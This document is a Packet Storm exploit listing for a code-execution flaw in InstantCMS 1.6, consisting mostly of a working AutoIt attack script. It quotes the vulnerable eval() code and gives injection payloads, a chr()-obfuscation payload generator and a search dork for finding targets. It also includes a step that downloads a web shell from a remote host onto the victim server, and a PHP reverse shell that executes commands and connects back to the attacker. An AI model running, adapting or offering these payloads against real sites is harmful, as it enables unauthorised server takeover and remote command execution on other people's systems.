InstantCMS 1.6 Code Execution

2013-06-26T00:00:00
ID PACKETSTORM:122176
Type packetstorm
Reporter Akastep
Modified 2013-06-26T00:00:00

Description

                                        
                                            `#NoTrayIcon  
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****  
#AutoIt3Wrapper_Outfile=exploit.exe  
#AutoIt3Wrapper_UseUpx=n  
#AutoIt3Wrapper_Change2CUI=y  
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****  
#include <Inet.au3>  
#include <String.au3>  
  
#cs  
  
Demo vid: http://youtu.be/j_RIPh-nYpY  
Print Screen: http://s34-temporary-files.radikal.ru/a9d69c791f054e7f9c9bd469fc0b43fd/-929206895.png  
  
Download: http://www.instantcms.ru/load/url=/download/instantCMS_20100515_v1.6.2.zip  
  
Or:  
  
http://www.instantcms.ru/download.html  
  
Dork: InstantCMS © 2007-2010  
  
In Wild i found 1.7 versions too which is vulnerable too.  
<?php  
//instantCMS_20100515_v1.6.2.zip/components/search/frontend.php  
/*********************************************************************************************/  
// //  
// InstantCMS v1.6 (c) 2010 FREEWARE //  
// http://www.instantcms.ru/, info@instantcms.ru //  
// //  
// written by Vladimir E. Obukhov, 2007-2010 //  
// //  
/*********************************************************************************************/  
  
  
  
  
// SNIP//  
  
if ($look == 'phrase'){  
$against .= '\"'.$query.'\"';  
}  
  
//RUN SEARCH PROCESSORS  
//get list of components and look for search processor in component folder  
$sql = "SELECT link FROM cms_components";  
$rs = $inDB->query($sql) ;  
if ($inDB->num_rows($rs)){  
while ($component = $inDB->fetch_assoc($rs)){  
$spfile = $_SERVER['DOCUMENT_ROOT'].'/components/'.$component['link'].'/psearch.php';  
if (file_exists($spfile)){  
if (in_array($component['link'], $cfg['comp'])){  
include $spfile;  
eval('search_'.$component['link'].'("'.$against.'", "'.$look.'", "'.$mode.'");');  
}  
}  
}  
}  
  
  
// EOF SNIP //  
  
Notice: eval() cunstruction.  
  
Exploitation:  
Payload: ${echo phpinfo()}  
  
site.tld/index.php?view=search&query=${echo phpinfo()}&look=allwords  
  
Drop shell?NP.  
  
=======================================================================================  
<?php  
  
/*  
  
Simple Payload generator  
  
*/  
  
  
$str='http://search.tld/andfind.txt';//shell url. you'll drop it from server which is in under your control.//  
  
  
echo '<pre>' . PHP_EOL;  
for($z=0;$z<=strlen($str)-1;$z++)  
{  
$z==strlen($str)-1 ? $plg='chr(' . ord(substr($str,$z,1)) .')' : $plg='chr(' . ord(substr($str,$z,1)) .')' . '.';echo $plg;  
}?>  
  
=======================================================================================  
  
Then drop it using the following way:  
  
${echo file_put_contents(PAYLOAD1,file_get_contents(PAYLOAD2))}  
  
  
  
As reverse shell uses:  
  
  
<?php  
error_reporting(0);  
set_time_limit(0);  
$ip=trim((string)$_SERVER['REMOTE_ADDR']);  
$port=preg_replace('/[^0-9]/i','',(string)$_SERVER['HTTP_USER_AGENT']);  
if (empty($port)){ die('<!-- Welcome BH -->');}  
$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$responce=socket_connect($socket,$ip,$port);  
$hello.=PHP_EOL . 'W00T: ';socket_write($socket,$hello,strlen($hello));  
while($alive=@socket_read($socket, 31337))  
{$responce=`$alive`;$responce.=PHP_EOL .'W00T: ';socket_write($socket,$responce,strlen($responce));}socket_close($socket);  
  
  
  
  
  
#ce  
  
  
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld' & ' yournetcatport' & @CRLF  
$fakeua='Mozilla/ (compatible; MSIE ; Windows NT ; WOW Trident/) ';  
$vulnurl='/index.php?view=search&query=Shoutz)&look=allwords';  
$kissyou='${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}';  
$pissagainst_wind='<!-- Welcome BH -->';  
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;  
#cs  
ConsoleWrite('debug ' & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'));  
exit;  
#ce  
  
  
ConsoleWrite($triptrop & '# instantCMS_20100515_v1.6.2 PHP Code Execution Exploit # ' & @CRLF & _  
'# *Via Reverse Shell* #' & @CRLF & _  
'# Usage: ' & @ScriptName & ' http://site.tld' & ' yournetcatport #' & @CRLF & _  
'# /AkaStep #' & $triptrop)  
  
  
  
if $CmdLine[0] <> 2 Then  
;ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);  
MsgBox(64,"",$msg_usage);  
exit;  
EndIf  
  
  
  
$rsite=$CmdLine[1];  
  
$PayloadUA=$CmdLine[2];  
  
  
ConsoleWrite($triptrop & '[+] Verifying vulnerability [+]' & $triptrop);  
  
HttpSetUserAgent($fakeua);  
$isvulnerable=_INetGetSource($rsite & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'),True);  
if StringInStr($isvulnerable,'allow_url_fopen') Then  
ConsoleWrite($triptrop & '[+] WoHoo! Remote Site Is vulnerable! [+]' & $triptrop);  
Else  
ConsoleWrite($triptrop & '[-] Sorry Dude:( Not vulnerable:( [-]' & $triptrop);  
exit;  
EndIf  
  
#cs  
  
Time To get reversel shell!  
First we'll drop our shell as includes/a.php  
Then we'll check for shell existense.  
If exists then we'll try bc to us.  
  
  
${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}&look=allwords  
  
  
  
#ce  
  
  
#cs  
EXPLOITING!  
#ce  
HttpSetUserAgent($fakeua)  
InetGet($rsite & StringReplace($vulnurl,'Shoutz)',$kissyou),'',1)  
  
sleep(Random(1500,3000,1));//random sleep for few seconds  
  
  
#cs  
Now checking for existence of our dropped shell.  
#ce  
  
  
HttpSetUserAgent($fakeua)  
  
$dont=_INetGetSource($rsite & '/includes/a.php',True)  
  
if StringInStr($dont,$pissagainst_wind) Then  
ConsoleWrite($triptrop & '[+] Seems We Are going To Travel xD! [+]' & $triptrop)  
  
  
Else  
ConsoleWrite($triptrop & "[+] Can't find Shell! Try to exploit Manually! [+]" & $triptrop);  
exit;  
EndIf  
  
  
  
#cs  
And Finally Getting Reverse Shell  
#ce  
  
HttpSetUserAgent($PayloadUA)  
  
InetGet($rsite & '/includes/a.php','',1,1)  
  
  
  
ConsoleWrite($triptrop & "[+] Happy Travel! [+]" & $triptrop);  
exit;  
  
  
  
#cs  
  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
itsecuritysolutions.org  
waraxe.us  
exploit-db.com  
insecurety.net  
  
================================================  
  
/AkaStep  
  
  
  
  
  
#ce  
  
`